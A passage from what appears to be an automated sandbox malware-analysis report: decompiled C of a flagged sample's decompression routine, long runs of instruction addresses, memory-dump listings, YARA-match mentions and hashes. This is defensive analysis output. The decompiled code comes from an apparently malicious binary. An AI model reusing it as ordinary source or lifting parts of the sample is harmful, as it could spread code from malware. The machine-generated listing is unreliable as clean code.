												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004072B4( &(__esi[3]), __edi, 0x101, 0x4084e0, 0x408520, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004072B4(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408560, 0x40859c, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406add
0x00406add
0x00406add
0x00406add
0x00406add
0x00406ae1
0x00000000
0x00000000
0x00406ae7
0x00406ae7
0x00406aea
0x00406aed
0x00406af2
0x00406af4
0x00406af7
0x00406afa
0x00406afd
0x00406afd
0x00406b00
0x00000000
0x00000000
0x00406b02
0x00406b02
0x00406b05
0x00406b0a
0x00406b0c
0x00406b0f
0x00406b15
0x00406874
0x00406874
0x00406877
0x0040687d
0x00406883
0x0040688c
0x00406892
0x00406895
0x0040689c
0x004068a1
0x004068a7
0x004068b2
0x004068b2
0x00406b1b
0x00406b1b
0x00406b25
0x00000000
0x00000000
0x00406b2b
0x00406b2b
0x00406b2f
0x00406b32
0x00406b32
0x00406b36
0x00406b3c
0x00406b3c
0x00406b3f
0x00406b42
0x00406b48
0x00000000
0x00000000
0x00406b4a
0x00406b6c
0x00406b6c
0x00406b6f
0x00000000
0x00000000
0x00406b4c
0x00406b50
0x00000000
0x00000000
0x00406b56
0x00406b56
0x00406b59
0x00406b5c
0x00406b61
0x00406b63
0x00406b66
0x00406b69
0x00406b69
0x00406b71
0x00406b71
0x00406b77
0x00406b7a
0x00406b7d
0x00406b7d
0x00406b84
0x00406b88
0x00406b8c
0x00406b8f
0x00406b92
0x00406b98
0x00406b9d
0x00000000
0x00000000
0x00406b9f
0x00406bb3
0x00406bb3
0x00406bb7
0x00000000
0x00000000
0x00406ba1
0x00406ba4
0x00406ba4
0x00406bab
0x00406bb0
0x00406bb0
0x00406bb0
0x00406bb9
0x00406bb9
0x00406bbc
0x00406bca
0x00406bd0
0x00406bd5
0x00406bdb
0x00406be1
0x00406be7
0x00406bee
0x00406c02
0x00406c02
0x004071d1
0x004071d1
0x004071d1
0x004071d6
0x00000000
0x00000000
0x0040680e
0x0040680e
0x00000000
0x00406e09
0x00406e09
0x00406e0d
0x00406e10
0x00406e13
0x00406e16
0x00000000
0x00000000
0x00406e1c
0x00406e1c
0x00406e41
0x00406e41
0x00406e41
0x00406e43
0x00000000
0x00000000
0x00406e21
0x00406e21
0x00406e25
0x00000000
0x00000000
0x00406e2b
0x00406e2b
0x00406e2e
0x00406e31
0x00406e34
0x00406e36
0x00406e38
0x00406e3b
0x00406e3e
0x00406e3e
0x00406e3e
0x00406e45
0x00406e45
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e5a
0x00406e5d
0x00406e5f
0x00406e62
0x00406e64
0x00406e78
0x00406e78
0x00406e7b
0x00406e95
0x00406e95
0x00406e98
0x00000000
0x00000000
0x00406e9e
0x00406e9e
0x00406ea1
0x00000000
0x00000000
0x00406ea7
0x00406ea7
0x00000000
0x00406ea7
0x00406e7d
0x00406e80
0x00406e87
0x00406e8a
0x00000000
0x00406e8a
0x00406e66
0x00406e6a
0x00406e6d
0x00000000
0x00000000
0x00406eb2
0x00406eb2
0x00406ed7
0x00406ed7
0x00406ed7
0x00406ed9
0x00000000
0x00000000
0x00406eb7
0x00406eb7
0x00406ebb
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ec7
0x00406eca
0x00406ecc
0x00406ece
0x00406ed1
0x00406ed4
0x00406ed4
0x00406ed4
0x00406edb
0x00406ee3
0x00406ee6
0x00406ee9
0x00406eeb
0x00406eee
0x00406eee
0x00406ef0
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00000000
0x00000000
0x00406f03
0x00406f03
0x00406f28
0x00406f28
0x00406f28
0x00406f2a
0x00000000
0x00000000
0x00406f08
0x00406f08
0x00406f0c
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f15
0x00406f18
0x00406f1b
0x00406f1d
0x00406f1f
0x00406f22
0x00406f25
0x00406f25
0x00406f25
0x00406f2c
0x00406f2c
0x00406f34
0x00406f37
0x00406f3a
0x00406f3d
0x00406f41
0x00406f44
0x00406f46
0x00406f49
0x00406f4c
0x00406f66
0x00406f66
0x00406f69
0x00000000
0x00000000
0x00406f6f
0x00406f6f
0x00406f72
0x00406f79
0x00000000
0x00406f79
0x00406f4e
0x00406f51
0x00406f58
0x00406f5b
0x00000000
0x00000000
0x00406f81
0x00406f81
0x00406fa6
0x00406fa6
0x00406fa6
0x00406fa8
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x00000000
0x00000000
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9b
0x00406f9d
0x00406fa0
0x00406fa3
0x00406fa3
0x00406fa3
0x00406faa
0x00406fb2
0x00406fb5
0x00406fb8
0x00406fba
0x00406fbd
0x00406fbd
0x00406fbf
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fc8
0x00406fcd
0x00406fcf
0x00406fd5
0x00406fd7
0x00406fec
0x00406fee
0x00406fee
0x00406fd9
0x00406fdf
0x00406fe1
0x00406fe3
0x00406fe3
0x00406ff0
0x00406ff4
0x00406ff7
0x00406ffd
0x00406ffd
0x00407000
0x00407000
0x00407000
0x00407002
0x00000000
0x00000000
0x00407008
0x00407008
0x0040700e
0x00407010
0x00407035
0x00407038
0x0040703e
0x00407043
0x00407049
0x0040704f
0x00407051
0x00407054
0x0040705d
0x00407063
0x00407063
0x00407056
0x00407058
0x0040705a
0x0040705a
0x00407065
0x0040706b
0x0040706d
0x00407070
0x00407072
0x00407078
0x0040707a
0x0040707c
0x0040707e
0x00407080
0x00407083
0x0040708c
0x0040708f
0x0040708f
0x00407085
0x00407085
0x00407088
0x00407088
0x00407083
0x0040707a
0x00407091
0x00407093
0x00000000
0x00000000
0x00000000
0x00000000
0x00407093
0x00407012
0x00407012
0x00407018
0x0040701e
0x00407020
0x00000000
0x00000000
0x00407022
0x00407022
0x00407024
0x00407026
0x0040702f
0x0040702f
0x00407028
0x00407028
0x0040702b
0x0040702b
0x00407031
0x00407033
0x00000000
0x00000000
0x00407099
0x00407099
0x0040709e
0x004070a0
0x004070a1
0x004070a2
0x004070a3
0x004070a9
0x004070ac
0x004070af
0x004070b2
0x004070b4
0x004070ba
0x004070ba
0x004070bd
0x004070bd
0x004070bd
0x004070bd
0x004070c6
0x00000000
0x00000000
0x004070cb
0x004070cb
0x004070ce
0x004070d1
0x004070d3
0x0040716a
0x0040716a
0x0040716d
0x0040716f
0x00407170
0x00407171
0x00407174
0x00000000
0x00407174
0x004070d9
0x004070d9
0x004070df
0x004070e1
0x00407106
0x00407109
0x0040710f
0x00407114
0x0040711a
0x00407120
0x00407122
0x00407125
0x0040712e
0x00407134
0x00407134
0x00407127
0x00407129
0x0040712b
0x0040712b
0x00407136
0x0040713c
0x0040713e
0x00407141
0x00407143
0x00407149
0x0040714b
0x0040714d
0x0040714f
0x00407151
0x00407154
0x0040715d
0x00407160
0x00407160
0x00407156
0x00407156
0x00407159
0x00407159
0x00407154
0x0040714b
0x00407162
0x00407164
0x00000000
0x00000000
0x00000000
0x00000000
0x00407164
0x004070e3
0x004070e3
0x004070e9
0x004070ef
0x004070f1
0x00000000
0x00000000
0x004070f3
0x004070f3
0x004070f5
0x004070f7
0x004070fe
0x004070fe
0x00407100
0x004070f9
0x004070f9
0x004070fb
0x004070fb
0x00407102
0x00407104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040717c
0x0040717c
0x0040717f
0x00407181
0x00407184
0x00407187
0x00407187
0x00407187
0x00407187
0x00000000
0x00000000
0x00000000
0x00406835
0x00406819
0x00000000
0x0040681f
0x00406822
0x0040682c
0x0040682f
0x00406832
0x00000000
0x00406832
0x00406819
0x0040683d
0x00406840
0x00406844
0x0040684e
0x00406858
0x0040685b
0x00406861
0x00406995
0x00406997
0x0040699d
0x004069a0
0x004069a3
0x00000000
0x004069a3
0x00406867
0x00406867
0x00406868
0x004068c0
0x004068c0
0x004068c7
0x0040696d
0x0040696d
0x00406972
0x00406975
0x0040697a
0x0040697d
0x00406982
0x00406985
0x0040698a
0x0040698d
0x0040698d
0x00000000
0x004068cd
0x004068cd
0x004068cd
0x004068cd
0x004068d1
0x004068d1
0x004068f3
0x004068f6
0x004068f8
0x004068fb
0x00406900
0x004068d6
0x004068d6
0x004068db
0x004068dd
0x004068df
0x004068e4
0x004068ea
0x004068ef
0x004068f1
0x004068f1
0x004068e6
0x004068e6
0x004068e6
0x004068e4
0x00000000
0x00406902
0x0040692f
0x00406934
0x00406936
0x00406937
0x00406939
0x0040693a
0x0040693a
0x0040693a
0x00406962
0x00406967
0x00406967
0x00000000
0x00406967
0x00406900
0x004068c7
0x0040686a
0x0040686a
0x0040686b
0x004068b5
0x00000000
0x004068b5
0x0040686d
0x0040686e
0x00000000
0x00000000
0x00000000
0x00000000
0x004069ca
0x004069ca
0x004069ca
0x004069cd
0x00000000
0x00000000
0x004069aa
0x004069aa
0x004069ae
0x00000000
0x00000000
0x004069b4
0x004069b4
0x004069b7
0x004069ba
0x004069bf
0x004069c1
0x004069c4
0x004069c7
0x004069c7
0x004069c7
0x004069cf
0x004069cf
0x004069d2
0x004069d4
0x004069d9
0x004069dc
0x004069de
0x004069e1
0x00000000
0x00000000
0x004069e7
0x004069e7
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x004069f9
0x004069f9
0x004069fc
0x004069fe
0x00406a9c
0x00406a9c
0x00406a9f
0x00406aa1
0x00406aa1
0x00406aa4
0x00406aa7
0x00406aa9
0x00406aab
0x00406aad
0x00406aad
0x00406ab6
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406ad0
0x00406ad0
0x00406ad6
0x00406ad6
0x00406ad6
0x00000000
0x00406aca
0x00406a04
0x00406a04
0x00406a0a
0x00406a0d
0x00406a0f
0x00406a3a
0x00406a3d
0x00406a43
0x00406a48
0x00406a4e
0x00406a54
0x00406a56
0x00406a59
0x00406a62
0x00406a68
0x00406a68
0x00406a5b
0x00406a5d
0x00406a5f
0x00406a5f
0x00406a6a
0x00406a70
0x00406a73
0x00406a75
0x00406a77
0x00406a7d
0x00406a7f
0x00406a81
0x00406a84
0x00406a8d
0x00406a8d
0x00406a8f
0x00406a86
0x00406a86
0x00406a89
0x00406a89
0x00406a91
0x00406a91
0x00406a7f
0x00406a94
0x00406a96
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a96
0x00406a11
0x00406a11
0x00406a17
0x00406a1d
0x00406a1f
0x00000000
0x00000000
0x00406a21
0x00406a21
0x00406a23
0x00406a25
0x00406a28
0x00406a2f
0x00406a2f
0x00406a31
0x00406a2a
0x00406a2a
0x00406a2c
0x00406a2c
0x00406a33
0x00406a35
0x00406a38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b3c
0x00406b3f
0x00406b42
0x00406b48
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d1f
0x00406d1f
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d2a
0x00406d30
0x00406d37
0x00406d39
0x00000000
0x00000000
0x00406c0d
0x00406c0d
0x00406c35
0x00406c35
0x00406c35
0x00406c37
0x00000000
0x00000000
0x00406c15
0x00406c15
0x00406c19
0x00000000
0x00000000
0x00406c1f
0x00406c1f
0x00406c22
0x00406c25
0x00406c28
0x00406c2a
0x00406c2c
0x00406c2f
0x00406c32
0x00406c32
0x00406c32
0x00406c39
0x00406c39
0x00406c41
0x00406c44
0x00406c4a
0x00406c4d
0x00406c51
0x00406c55
0x00406c58
0x00406c5b
0x00406c73
0x00406c73
0x00406c76
0x00406c84
0x00406c87
0x00406c78
0x00406c78
0x00406c7a
0x00406c81
0x00406c81
0x00406cb0
0x00406cb0
0x00406cb0
0x00406cb3
0x00406cb5
0x00000000
0x00000000
0x00406c90
0x00406c90
0x00406c94
0x00000000
0x00000000
0x00406c9a
0x00406c9a
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca5
0x00406ca7
0x00406caa
0x00406cad
0x00406cad
0x00406cad
0x00406cb7
0x00406cb7
0x00406cb9
0x00406cbb
0x00406cc6
0x00406cc9
0x00406ccc
0x00406cce
0x00406cd0
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cdd
0x00406ce0
0x00406ce3
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf2
0x00000000
0x00000000
0x00406cf8
0x00406cf8
0x00406cfc
0x00406d0d
0x00406d0d
0x00406d0d
0x00406d0f
0x00406d0f
0x00406d13
0x00406d13
0x00406d13
0x00406d15
0x00406d16
0x00406d19
0x00406d19
0x00406d19
0x00406d1c
0x00000000
0x00406d1c
0x00406cfe
0x00406cfe
0x00406d01
0x00000000
0x00000000
0x00406d07
0x00406d07
0x00000000
0x00406d07
0x00406c5d
0x00406c5d
0x00406c5f
0x00406c61
0x00406c64
0x00406c67
0x00406c6b
0x00406c6b
0x00406d3f
0x00406d3f
0x00406d42
0x00406d49
0x00406d4d
0x00406d4f
0x00406d52
0x00406d55
0x00406d5a
0x00406d5d
0x00406d5f
0x00406d60
0x00406d63
0x00406d6e
0x00406d71
0x00406d88
0x00406d8d
0x00406d94
0x00406d99
0x00406d9d
0x00406d9f
0x00406d9f
0x00406d9f
0x00406da2
0x00406da4
0x00000000
0x00406daa
0x00406daa
0x00406dae
0x00406db9
0x00406dcc
0x00406dd1
0x00406dd6
0x00406dd8
0x00000000
0x00000000
0x00406dde
0x00406dde
0x00406de1
0x00406de3
0x00406df1
0x00406df1
0x00406df4
0x00406df4
0x00406df7
0x00406dfa
0x00406dfd
0x00406e00
0x00406e03
0x00406e06
0x00000000
0x00406e06
0x00406de5
0x00406de5
0x00406deb
0x00000000
0x00000000
0x00000000
0x00406deb
0x00000000
0x00000000
0x00000000
0x0040718a
0x0040718a
0x00407190
0x00407196
0x0040719b
0x004071a1
0x004071a7
0x004071a9
0x004071ac
0x004071b5
0x004071bb
0x004071bb
0x004071ae
0x004071b0
0x004071b2
0x004071b2
0x004071bd
0x004071bf
0x004071c2
0x004071fd
0x004071fd
0x00000000
0x004071c4
0x004071c4
0x004071c4
0x004071ca
0x004071cd
0x004071cf
0x00407204
0x00407206
0x00000000
0x00407206
0x00000000
0x004071cf
0x00000000
0x0040680e
0x004071dc
0x00000000
0x004071dc
0x00406bf0
0x00406bf2
0x00000000
0x00000000
0x00406bf4
0x00406bf4
0x00406bf7
0x00000000
0x00406bf7
0x00406b3c
0x00406afd
0x004071e1
0x004071e4
0x004071e6
0x004071ef
0x004071f5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 02B66F95 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7af7f8819f3b66659474f803008a69afe1880d200a51a7bff162221d7e55000
Instruction ID: a09587c30447c402cf84ab53c3afa0b4b51bfe8932a214b160726b3f3c791bf1
Opcode Fuzzy Hash: c7af7f8819f3b66659474f803008a69afe1880d200a51a7bff162221d7e55000
Instruction Fuzzy Hash: B9C15872A043599FDF30DE64C9687EF73A6EF95390F96802DDC899B204D7349A42CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02B60001 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad55f1ec075da7de4ae36c7bd5fe1b54cc558a9a6b5147ea15676c4d26f1130e
Instruction ID: 33587346d0b4dd5d7e823dcc34672c7031a54b0b0048e3f7c732a7d323ef1e00
Opcode Fuzzy Hash: ad55f1ec075da7de4ae36c7bd5fe1b54cc558a9a6b5147ea15676c4d26f1130e
Instruction Fuzzy Hash: 6D61F306E2E305CBE7533076819D3F62252FF662D6E558FE58D27631A1B31F054AC6C4

Uniqueness

Uniqueness Score: -1.00%

Function 02B66FC4 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd84a5ed67275515836c7fd83f56110da36b533c2013ac7932e67484cd316a62
Instruction ID: bd46f74af2b6e7fd9d6f9e829bf1c4fdc0e282d4e647ef6050fb4dadc502a1ca
Opcode Fuzzy Hash: fd84a5ed67275515836c7fd83f56110da36b533c2013ac7932e67484cd316a62
Instruction Fuzzy Hash: B7B19B32A4035A9FDF34DD64C9643EB73B2EF95350F96842DDC899B204D7309A82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6008F Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f14a38d0edce60b212144f1e68c0b57158eeac3018a20833674d1db29cae6d57
Instruction ID: fea02be6f104dd6c975362caa3a6408e63ee744796fda24b854f199e30531cd4
Opcode Fuzzy Hash: f14a38d0edce60b212144f1e68c0b57158eeac3018a20833674d1db29cae6d57
Instruction Fuzzy Hash: AD61F006E3E305CFE743307681AD3F66252FF66296D658FA68D27632A1B31F044AC6C4

Uniqueness

Uniqueness Score: -1.00%

Function 02B60057 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
